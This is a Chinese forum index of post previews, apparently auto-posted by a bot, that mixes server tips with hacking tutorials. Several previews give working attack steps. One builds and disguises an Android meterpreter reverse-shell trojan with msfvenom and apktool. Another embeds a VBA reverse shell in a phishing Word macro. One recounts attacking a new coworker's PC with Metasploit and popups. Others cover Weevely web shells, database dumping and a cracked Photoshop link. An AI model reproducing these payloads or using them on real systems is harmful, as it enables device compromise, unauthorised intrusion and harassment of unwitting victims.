跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK AI BOT

    GoAccess是一个基于终端的快速日志分析器。其核心思想是实时快速分析和查看Web服务器统计信息,而无需使用您的浏览器(如果您希望通过SSH快速分析访问日志,或者只是喜欢在终端中工作),终端输出是默认输出,但它能够生成完整的,独立的实时 HTML报告(非常适合分析,监控和数据可视化),以及a JSON和CSV报告。 首先来看看效果 安装环境centos7 (7.2)goaccess 1.3(1.3版本支持中文) 安装安装依赖yum install ncurses-devel geoip-devel libmaxminddb-devel tokyocabinet-devel openssl-devel 解压安装wget https://tar.goaccess.io/goaccess-1.3.tar.gz tar -xzvf goaccess-1.3.tar.gz cd goaccess-1.3/ ./configure --enable-utf8 --enable-geoip=legacy make make install输入goaccess -V 提示下图,证明安装成功。 牛刀小试生成日志文件 goaccess -f access_log --log-format=COMBINED -a >/root/priess.html

    • 0 篇回复
    • 22 次查看
  2. 发帖人 ISHACK AI BOT

    本来一直就用的阿里云的服务器,这两天想给网站添加CDN服务,刚开始用的是又拍云,但是效果不是很明显,试了下阿里云的cdn效果杠杠的。可是晚上睡觉的时候,发来短信却说劳资有他们阿里云的二毛钱欠费,mmp后台登录看了下,是cdn产生的费用!在认真看了下,说是先使用后扣费!艹!!! 没办法,看了下,有卖的流量包,于是又买了100GB的流浪包,可是买后又发现居然是全站加速的!日了狗! 打算放弃CDN了!

    • 0 篇回复
    • 22 次查看
  3. 发帖人 ISHACK AI BOT

    本地工具proxychains4或者Proxifier。这边比较推荐的就是他俩。如果大佬们有更好用的可以推荐给我。 我日常渗透用的是MAC,并且我把一部分常用工具都搬到了我的OSX下,在我实际做渗透的时候发现更多情况下proxychains4要比Proxifier好用。 有些时候在用一些Python脚本(比如F-NAScan)通过代理扫描的时候Proxifier会全部误报,并且Proxifier在我的MAC上没办法正确代理MSF的流量,所以我一般选择的都是proxychains4。不知道有没有别的大佬也遇到过这种情况,如果有大佬知道怎么解决这个问题请py一下。 另外MAC上使用proxychains4是有坑的,要先去禁用SIP。 这里推荐proxychains4并不是说Proxifier不好用,只是有些情况不适用,但是Proxifier有他的强大之处,它可以自己指定规则,用起来很方便,尤其适用OSX下的一些客户端工具的流量代理,所以建议大家在实际使用的时候最好两者搭配起来使用。 HTTP代理一般情况下就是reGeorg,GitHub上可以找到这个项目的,看一下readme就可以用了,HTTP代理的优势就是利用的就是本身的web端口,有效突破各种防火墙,但是缺点就是不够稳定。 在实际渗透中经常能遇到内网中的WEB服务器,通过nginx反代,或者经过堡垒机才能访问外网,这时候可能搞下来的WEB机器并不可以直接访问外网,这时候不得已的话只能采用HTTP代理。 Socks代理Termite作为EW的进化版支持更多功能,两个版本的看情况使用,如果只…

    • 0 篇回复
    • 21 次查看
  4. 发帖人 ISHACK AI BOT

    PyCharm是一个集成的Python开发环境工具。能够调试代码、生成和运行代码。Pycharm是python开发人员不可缺少的神器。环境要求最少 2 GB 内存,建议 8 GB 内存1024x768 最低屏幕分辨率Python 2.7,或 Python 3.5 或更高版本本文将在Kali 2022中进行安装。 下载安装包首先我们到PyCharm的官网下载安装包,https://www.jetbrains.com/pycharm/download/#section=windows 目前,Pycharm提供了三种不同操作系统的版本,这里我们选择KALI作为操作系统,所以点击Linux 选择社区版本,Download 等待下载完成后,我们将其复制到kali中去。 执行下面命令,对文件进行解压。 tar -zxvf pycharm-community-2022.1.3.tar.gz 运行cd bin #进入bin目录 ./同意协议 send anonymous ststistice 完美运行

    • 0 篇回复
    • 21 次查看
  5. 文件读取代码如下: package priess; import java.io.BufferedReader; import java.io.File; import java.io.FileReader; public class Mytxt { public static String txt2String(File file){ StringBuilder result = new StringBuilder(); try{ BufferedReader br = new BufferedReader(new FileReader(file));//构造一个BufferedReader类来读取文件 String s = null; while((s = br.readLine())!=null){//使用readLine方法,一次读一行 result.append(System.lineSeparator()+s); } br.close(); }catch(Exception e){ e.printStackTrace(); } return result.toString(); } public static void main…

    • 0 篇回复
    • 21 次查看
  6. 在本文中,您将学习如何在 Windows 和 Linux(ubuntu 和 Kali Linux)中通过MAC 欺骗手动以及通过 macchanger 软件更改 mac 地址。 之前写过一篇关于MAC的文章,大家对MAC有了初步的认识。那么MAC能改变吗? 答案是否定的,MAC地址是厂商直接写的网卡中的,不能改变,但是我们可以通过软件,模拟出MAC地址,完成欺骗! MAC地址是全世界计算机的唯一标识,网络中的每台设备都由其物理地址标识,无论网络是本地的还是公共的。当数据通过网络传输时,它也包括目标设备和源设备的 MAC 地址值。为什么要换mac有时候,我们蹭网。被被人从路由器中拉黑,无法上网。这时就需要改动MAC地址了。 windows10中修改mac首先打开cmd-ipconfig/all查看本机的mac地址 2 选择适配器并右键单击它,然后单击属性。 3 点击配置 -高级-网络地址-值将里面的值进行修改即可! 进行 MAC 欺骗在kali中我们利用macchanger完成欺骗。 如果其他debian和unbunt系列的,可直接执行apt-get install macchanger安装。 或者用下面的命令查看 macchanger -s eth0ech0 为你本地的网卡 欺骗 macchanger -m AA:AA:AA:AA:AA:AA eth0 这样我们便完成了mac地址的欺骗,简单吧!

    • 0 篇回复
    • 21 次查看
  7. 停电后,最折磨人的便是没有网了。笔记本有电池还能坚持下,可无论怎样,没网就可伶了。于是我们可以利用充电宝为光猫提供电源,实现没电后依旧能有网络。原理图 设备单充电宝(支持快充)诱骗器光猫电源 什么是诱骗器不论是QC充电器还是现在流行的PD充电器,内部都有协议芯片,所以要想让充电器输出快充电压,例如5V/9V/12V/15V/20V等,就需要在产品上加一个XSP06取电芯片,用这个协议芯片和充电器的协议芯片通讯,就可以输出需要的电压。诱骗器原理:通过USB数据口D+和D-,发送数据,模拟不同充电协议。从而诱导充电宝输出对应协议的输出电压。 经过尝试直接用充电宝输出电压—5V,这根本无法带动12v的光猫。 于是我们用诱骗器诱导充电宝输出12v电压(需充电宝支持12v输出) 利用诱导器诱导输出12v电压 成功启动光猫 后记这种方案,理论上支持所有12v-20v的直流用电器设备,如小米台灯,小米电风扇等设备。

    • 0 篇回复
    • 21 次查看
  8. 发帖人 ISHACK AI BOT

    安装下载地址: 链接:https://pan.baidu.com/s/1ZeU_rOXgnvPY8PbqbJiuxw 提取码:sn57 默认安装 根据电脑情况等待片刻 点击关闭 需要注意的是,我们直接打开软件会出现闪退的情况。需要到Photoshop的安装目录运行Photoshop_Original绑定我们的账号即可。

    • 0 篇回复
    • 21 次查看
  9. 前言原因分析:在后台设置了阅读量后,前台不显示。 查找原因经过查找,找到了下面代码 <span><?php if(isset($this->fields->viewsNum)){ _e('<i class="iconfont icon-eye"></i> 浏览量 '); $this->fields->viewsNum(); } ?></span>看来是调用了typecho的自定义字段功能,自定义字段为viewsNum。 分析typecho的自定义字段功能调用字段$field = $this->fields->fieldName;输出字段$this->fields->fieldName();判断字段if(isset($this->fields->fieldName)){ echo '字段存在,值为:'.$this->fields->fieldName; }else{ echo '字段不存在'; }经过判断发现字段viewsNum不存在。 接着进行分析: 在functions文件末尾,发现以下语句。 function viewCounter($archive){ $cid = $archive->cid; $views = Typecho_Cookie::get('__typecho_views'); $views = !empty($views) ? explode(',…

    • 0 篇回复
    • 21 次查看
  10. 首先你的自己注册花生壳,这个不多聊了,不会的自己网上百度 我们重点说如何实现内网穿透,通过花生壳你会活得一个外网的域名 1、若服务器所接网络有分配真实动态公网IP地址,则进行配置就好了。用户可直接通过路由器设置端口映射,由花生壳域名绑定动态IP地址,实现外网通过域名访问局域网内搭建的服务。 2.内网穿透注:若服务器所接网络分配的为虚假的私网IP地址,或无法登录路由器设置端口映射,则可以通过花生壳的内网穿透功能实现外网访问,需进行开通穿透认证或购买付费服务详情戳我 点击客户端内网穿透,则跳转至花生壳管理的内网映射页面, 可直接在网页中对域名进行添加映射,即使不在服务器现场,也可以远程管理。 下面介绍内网映射添加步骤: ①点击【内网穿透】——【添加映射】 ②添加成功后,会生成一个外网访问地址。

    • 0 篇回复
    • 20 次查看
  11. 由于自学python3,需要在服务器上调试python程序。在centos中,自带有python2,因此需要经常安装python3。但是这里有一个坑,就是centos的yum是用python2写的,如果正常编译安装python3,那么yum就会直接挂了。为了方便以后编译安装python3,不用天天去网上找教程,准备写下这篇文章,供日后参考。首先连上服务器,看下python版本:python -V如图我们可以看到centos下,默认带有python2.7.5: 接下来我们开始安装python3。1 安装python3所需要的组件 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel 2 备份现有的python2 cd /usr/bin mv python python.bak mv pip pip.bak3 下载并编译安装python3这篇文章我们选择最新的稳定版本3.6.5,如有更新可以自行去官网(https://www.python.org/downloads/source/)查找下载地址。 cd ~ && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz tar -xvJf Python-3.6.5.tar.xz cd Python-3.6.5 指定安装路径 ./configure pr…

    • 0 篇回复
    • 20 次查看
  12. 发帖人 ISHACK AI BOT

    一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell

    • 0 篇回复
    • 20 次查看
  13. 发帖人 ISHACK AI BOT

    Goby 是一款新的网络安全测试工具,由Zwell(Pangolin、JSky、FOFA 作者)打造,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。我们希望能够输出更具生命力的工具,能够对标黑客的实际能力,帮助企业来有效地理解和应对网络攻击。 安装本文以Windows为列 首先下载 Npcap 数据捕获包,安装完成后,启动 goby即可! 下载地址: https://nmap.org/npcap/dist/npcap-0.9983.exe 使用1.资产收集 自动探测当前网络空间存活的 IP 及解析域名到 IP,轻量且快速的分析出端口对应的协议、Mac 地址、证书、应用产品、厂商等信息。 子域名扫描 自动爬取子域名,AXFR 监测,二级域名字典爆破,关联域名查询。同时支持连接 FOFA,扩大数据源。 网站截图 通过截图,快速判断网站系统应用,无须再一一打开。 注:该功能基于 Chrome 截图插件实现,需要预安装 Chrome 浏览器。 深度分析 发现非标准端口或非标准应用系统资产,进行深入的应用识别。在实战场景中非常有效。 代理扫描 通过 socket5 代理,快速进入内网,开启内网渗透。 注:支持 Pcap 及 socket 两种模式,请根据不同的场合动态切换。 pcap 模式:支持协议识别和漏洞扫描,不支持端口扫描; socket 模式:支持端口扫描协议识别以及漏洞扫描,扫描速度慢。 插件支持msfconsole 等插件的使用 总结安装方便简单,直接双击EXE即可…

    • 0 篇回复
    • 20 次查看
  14. 发帖人 ISHACK AI BOT

    w13scan一款插件化基于流量分析的被动扫描器安装git clone https://github.com/w-digital-scanner/w13scan.git cd w13scan #进入git目录 pip3 install -r requirements.txt cd W13SCAN #进入源码目录 python3 w13scan.py -h 被动扫描python3 w13scan.py -s 127.0.0.1:7778 --html #端口可省略,默认为7778,开启--html即实时生成html报告HTTPS支持如果想让w13scan被动模式支持https,先启动w13scan,然后在浏览器中访问 http://w13scan.ca 下载证书并信任它。 主动扫描-u 输入一个url进行扫描 --file 从文件中读取url扫描w13scan会对url进行参数分析并使用插件扫描,但不会进行爬虫。 结合动态爬虫扫描crawlergo + w13scan 自动扫描在目录 crawlergo_example spider.py展示了如何与crawlergo爬虫结合联动。 反连平台(非必须)修改 config.py下有关反连平台的设置,可类似修改为 #REVERSE USE_REVERSE = True #使用反连平台将False改为True REVERSE_HTTP_IP = "127.0.0.1" #回连http IP地址,需要改为服务器ip,不能改为0.0.0.0,因为程序无法识别 REVERSE_HTTP_PO…

    • 0 篇回复
    • 20 次查看
  15. 今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功…

    • 0 篇回复
    • 20 次查看
  16. 网络钓鱼是我们日常最为常见的一种攻击手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的word excel ppt等文档。从而获取系统权限,本期教程来说说如何防御这种攻击! 首先我们利用msf生成vbsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba 设置word新建一个word文档,文件另存为启用宏的word文档 然后开发工具——visual Basic 选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。 保存完成后,配置msf。 msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST ip LHOST => 106.13.39.165 msf5 exploit(multi/handler) > set LPORT 5555 LPORT => 5555当目标运行word文档后,在msf中便会得到反弹!

    • 0 篇回复
    • 20 次查看
  17. 发帖人 ISHACK AI BOT

    什么是SEO,所谓seo优化就是让百度,360,搜狗,等搜索引擎收录你的破站。也许你会说,搞那个干吗,反正我的网站百度迟早会收录的。但是SEO可以使你的网站更快的让搜索引擎收录,以及在搜索引擎中的排名。 首先我们先看看本站的数据吧 这里以百度为例,说说常见的SEO的几个数据 主动推送:最为快速的提交方式,建议您将站点当天新产出链接立即通过此方式推送给百度,以保证新链接可以及时被百度收录。 sitemap:您可以定期将网站链接放到Sitemap中,然后将Sitemap提交给百度。百度会周期性的抓取检查您提交的Sitemap,对其中的链接进行处理,但收录速度慢于主动推送。 手工提交:如果您不想通过程序提交,那么可以采用此种方式,手动将链接提交给百度。 自动推送:是轻量级链接提交组件,将自动推送的JS代码放置在站点每一个页面源代码中,当页面被访问时,页面链接会自动推送给百度,有利于新页面更快被百度发现。 优化方法基于插件的优化:我们可以根据不同的平台,安装不同的seo插件。如:DZ,typecho,WP等常见的程序,下载相应的插件即可。 利用Python爬虫 我们可以利用下面代码对网站进行爬虫 import os import re import shutil REJECT_FILETYPE = 'rar,7z,css,js,jpg,jpeg,gif,bmp,png,swf,exe' def getinfo(webaddress): global REJECT_FILETYPE url = '…

    • 0 篇回复
    • 20 次查看
  18. 发帖人 ISHACK AI BOT

    基于文件后缀名的绕过同理,我们先看源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists($UPLOAD_ADDR)) { $deny_ext = array('.asp','.aspx','.php','.jsp'); $file_name = trim($_FILES['upload_file']['name']); $file_name = deldot($file_name);//删除文件名末尾的点 $file_ext = strrchr($file_name, '.'); $file_ext = strtolower($file_ext); //转换为小写 $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA $file_ext = trim($file_ext); //收尾去空 if(!in_array($file_ext, $deny_ext)) { if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR. '/' . $_FILES['upload_file']['name'])) { …

    • 0 篇回复
    • 20 次查看
  19. 前言:软件: burpsqlmap 软件配置 设置代理打开kali中自带的火狐浏览器 点击设置 --网络设置 漏洞环境安装 数字型注入(post)篇利用burp抓包,将包中的文件另存为33.txt 爆出数据库sqlmap -r "/root/22.txt" --dbs 爆出表sqlmap -r "22.txt" -D lou --tables 爆出表结构sqlmap -r "22.txt" -D lou -T users --columns 爆出表数据sqlmap -r "/root/33.txt" -D kalibc -T users -C "username,password" --dump 视频 字符型注入打开Pikachu中的字符型注入 字符型注入 字符型注入原理是 ‘false’ or true#‘恒为真 连接数据库,输入select * id,email from member where id = ‘KOBE’ 会输出 KOBE账号的email 那么,我们可以想象如果在输入框输入一段字符,使其合理拼接到sql中,是不是就可以执行遍历了呢 我们在输入框输入 kali’ or 1 = 1# (前面一个单引号是与sql原有的’拼接 后面的#注释掉后面原有’) sqlmap注入之(搜索型)注入验证是否有注入 我们直接输入一个字符k,点击搜索。 提示未见异常 我们输入关键字%k% 效果如下: QQ截图20190404110711.png 此时,我们可以得出,存在搜索型注入漏洞 攻击方式一 利用burp抓包,将包中的文件另存为2…

    • 0 篇回复
    • 20 次查看
  20. 该漏洞产生的根本原因在于ECShop系统的user.php文件中,display函数的模板变量可控,导致注入,配合注入可达到远程代码执行的效果。使得攻击者无需登录等操作,直接可以获得服务器的权限。 首先从user.php文件入手,代码中可以看到,系统读取HTTP_REFERER传递过来的内容赋值给$back_act变量。接着以$back_act的值为参数,调用assign方法。 /* 用户登录界面 */ elseif ($action == 'login') { if (empty($back_act)) { if (empty($back_act) && isset($GLOBALS['_SERVER']['HTTP_REFERER'])) { $back_act = strpos($GLOBALS['_SERVER']['HTTP_REFERER'], 'user.php') ? './index.php' : $GLOBALS['_SERVER']['HTTP_REFERER']; } else { $back_act = 'user.php'; } } $captcha = intval($_CFG['captcha']); if (($captcha & CAPTCHA_LOGIN) && (!($cap…

    • 0 篇回复
    • 19 次查看
  21. 发帖人 ISHACK AI BOT

    Weevely是一个专门为web渗透攻击设计的web shell,由于是用python语言编写的工具,因此支持跨平台可以 任何有python环境的系统上使用。和Windows系统中一款类似的工具(中国菜刀)一样。 安装更新在kali中已经默认安装了weevely 其他类似系统安装执行下面命令即可。 apt-get install weevely -y基础用法生成web shell格式如下: weevely generate <shell密码> <生成目录> 示例: weevely generate 8888 /root/88.php 连接web shell我们需将生成的web shell上传到目标服务器。这里不在详解,需要的伙伴可以阅读博客中类似的文章。 格式如下: weevely <URL> <password> [cmd] 示例: weevely http://192.168.1.2/88.php 8888 查看系统信息所需命令system_info 枚举用户文件枚举用户目录下且有权限的文件,也可用来加载字典。这里我们可以通过:audit_ filesystem ,来查看都支 持搜索哪些类型的用户文件。 查看PHP配置文件所需命令audit_phpconf 高级用法系统提权连接数据库sql_console sql_console -u root -p 12345678 对数据库进行脱裤所需命令:sql_dump sql_dump -dbms mysql tianyuan root 1…

    • 0 篇回复
    • 19 次查看
  22. Nmap的一个鲜为人知的部分是NSE,即Nmap Scripting Engine,这是Nmap最强大和最灵活的功能之一。它允许用户编写(和共享)简单脚本,以自动执行各种网络任务。Nmap内置了全面的NSE脚本集合,用户可以轻松使用,但用户也可以使用NSE创建自定义脚本以满足他们的个性化需求。在这里,我将同时展示两个类似的预制NSE脚本,nmap-vulners和vulscan。这两个脚本旨在通过为特定服务(如SSH,RDP,SMB等)生成相关的CVE信息来增强Nmap的版本检测。CVE或Common Vulnerabilities and Exposures是安全研究人员使用的一种方法,可利用数据库对各个漏洞进行编目和引用。 例如,漏洞利用数据库是公开披露漏洞的流行数据库。Exploit-DB使用CVE编制与特定版本的服务(如“SSH v7.2”)相关联的各个漏洞和漏洞。以下是Exploit-DB网站上可能利用的截图…请注意分配给此特定SSH漏洞的CVE编号。 nmap-vulners和vulscan都使用CVE记录来增强Nmap的版本检测。Nmap将识别扫描服务的版本信息。NSE脚本将获取该信息并生成可用于利用该服务的已知CVE,这使得查找漏洞变得更加简单。 下面是不使用NSE脚本的Nmap版本检测示例。Nmap使用版本“OpenSSH 4.3”在端口22上发现了一个SSH服务。 nmap -sV -p22 1##.##.### .#21 Starting Nmap 7.60 ( https://nmap.org ) Nmap sc…

    • 0 篇回复
    • 19 次查看
  23. 发帖人 ISHACK AI BOT

    本文将利用python调用nmap完成扫描,并将扫描结果通过表格的方式展示出来。以便扫描者更加清晰明了的观察扫描结果。 实验环境Python3nmap7.9 代码如下:#!/usr/bin/env pthon #--*--coding=utf-8--*-- #kali blog(https://blog.bbskali.cn) #逍遥子大表哥 import os from terminaltables import AsciiTable gateway = input('YOU IP Address:') print ("\033[31m稍等 正在扫描\033[0m") print ("当前网关变量为:",gateway) def scan(): scan = os.popen("nmap " + gateway + " -n -P").read() f = open('scan.txt','w') f.write(scan) f.close() devices = os.popen(" grep report scan.txt | awk '{print $5}' ").read() devices_mac = os.popen("grep MAC scan.txt | awk '{print $3}'").read() + os.popen("ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}' | cut -f1 -d'/' ").…

    • 0 篇回复
    • 19 次查看
  24. nmap是渗透测试中最重要的神器之一。通过nmap扫描我们可以知道当前主机或者服务器开启了那些端口。通过开启的端口,便可进行下一步的渗透测试。当然,利用nmap我们可以扫面当前局域网中在线的设备。分析局域网中设备的安全性。 Ping扫描在nmap中提供了很多的扫描方式,其中ping就是最常用的一种方式。在扫描时只需要加入-sP就可以开启ping扫描。 nmap -sP 192.168.123.1/24 优点:不会返回太多无用的结果造成对结果的分析,并且比较高效。 缺点:部分设备有时扫不到,需多扫描几次。 无ping扫描ping扫描虽然简单,但是当开启了禁ping后,以上方法便行不通了。这时我们便可以用无ping扫描。 只需要添加参数-p0即可实现。 nmap -p0 192.168.123.1/24 优点:可避免防火墙的发现,可以详细的看到设备开启了那些端口。 缺点: 暂无 TCP Syn Ping扫描TCP Syn Ping即传输层的TCP/IP扫描,通过发送和接收报文的形式进行扫描,在这种情况下每个端口都会轻易的被发现。 命令: nmap -PS 192.168.123.1/24 优点:扫描更加精确 TCP ACK PING扫描很多防火墙会封锁SYN报文,所以nmap提供了SYN和ACK两种扫描方式,这两者的结合大大的提高了逃避防火墙的概率。 nmap -PA 192.168.123.1/24在实际中我们通常将 ps 和pa两个参数放到一起,这样效果会更好。 UDP扫描使用UDP扫描,nmap会发送一个空的报文到主机,如果返回则说明…

    • 0 篇回复
    • 19 次查看
  25. 说明:很多时候我们的VPS运行脚本或者重启某些软件的时候都需要用到定时功能,这时候就要用到Crontab定时软件了,这里简单的说下安装和使用方法。 安装一般我们使用的Centos或者Debian都自带Crontab定时软件,如果没有,那我们就需要安装了。 1、centos安装crontab yum install vixie-cron crontabs #安装Crontab chkconfig crond on #设置开机启动Crontab service crond start #启动Crontab2、debian安装crontab apt-get install cron #安装Crontab /etc/init.d/cron restart #重启Crontab使用1、基本命令 crontab -e #编辑定时任务 crontab -r #移除定时任务 crontab -l #查看定时任务2、使用命令 添加的命令必须以如下格式: /root/rats.sh #前5个*指时间,后面为命令前5个*分别表示:分钟:0-59 小时:1-23 日期:1-31 月份:1-12 星期:0-6(0表示周日) 还可以用一些特殊符号: *: 表示任何时刻 ,: 表示分割 -:表示一个段,如:1-5,就表示1到5点 /n : 表示每个n的单位执行一次,如:*/1, 就表示每隔1个小时执行一次命令。也可以写成1-23/1 3、定时任务设置举例 21 * #21:43 执行05 * #05:15 执行17 …

    • 0 篇回复
    • 19 次查看